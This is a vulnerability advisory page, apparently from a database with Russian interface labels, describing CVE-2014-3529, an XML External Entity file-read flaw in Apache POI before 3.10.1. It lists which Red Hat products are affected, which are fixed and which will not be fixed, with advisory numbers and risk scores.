Описание
The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers to read arbitrary files via an OpenXML file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
It was found that Apache POI would resolve entities in OOXML documents. A remote attacker able to supply OOXML documents that are parsed by Apache POI could use this flaw to read files accessible to the user running the application server, and potentially perform more advanced XML External Entity (XXE) attacks.
Отчет
Red Hat Product Security has determined that CVE-2014-3529 is not exploitable by default in JBoss Portal Platform as provided by Red Hat. This flaw would only be exploitable if the Apache POI library provided by JBoss Portal Platform were used by a custom application to process user-supplied XML documents.
Затронутые пакеты
| Платформа | Пакет | Состояние | Рекомендация | Релиз |
|---|---|---|---|---|
| Red Hat BPM Suite 6 | apache-poi | Affected | ||
| Red Hat Enterprise Virtualization 3 | jasperreports-server-pro | Affected | ||
| Red Hat JBoss BRMS 5 | apache-poi | Will not fix | ||
| Red Hat JBoss BRMS 6 | apache-poi | Affected | ||
| Red Hat JBoss Portal 5 | apache-poi | Will not fix | ||
| Red Hat JBoss BPMS 6.0 | Fixed | RHSA-2014:1399 | 13.10.2014 | |
| Red Hat JBoss BRMS 6.0 | Fixed | RHSA-2014:1400 | 13.10.2014 | |
| Red Hat JBoss Data Virtualization 6.0 | apache-poi | Fixed | RHSA-2014:1398 | 13.10.2014 |
| Red Hat JBoss Fuse Service Works 6.0 | apache-poi | Fixed | RHSA-2014:1370 | 09.10.2014 |
| Red Hat JBoss Portal 6.2 | apache-poi | Fixed | RHSA-2015:1009 | 14.05.2015 |
Показывать по
Дополнительная информация
Статус:
EPSS
5 Medium
CVSS2
Связанные уязвимости
The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers to read arbitrary files via an OpenXML file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers to read arbitrary files via an OpenXML file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers ...
Improper Restriction of XML External Entity Reference in Apache POI
EPSS
5 Medium
CVSS2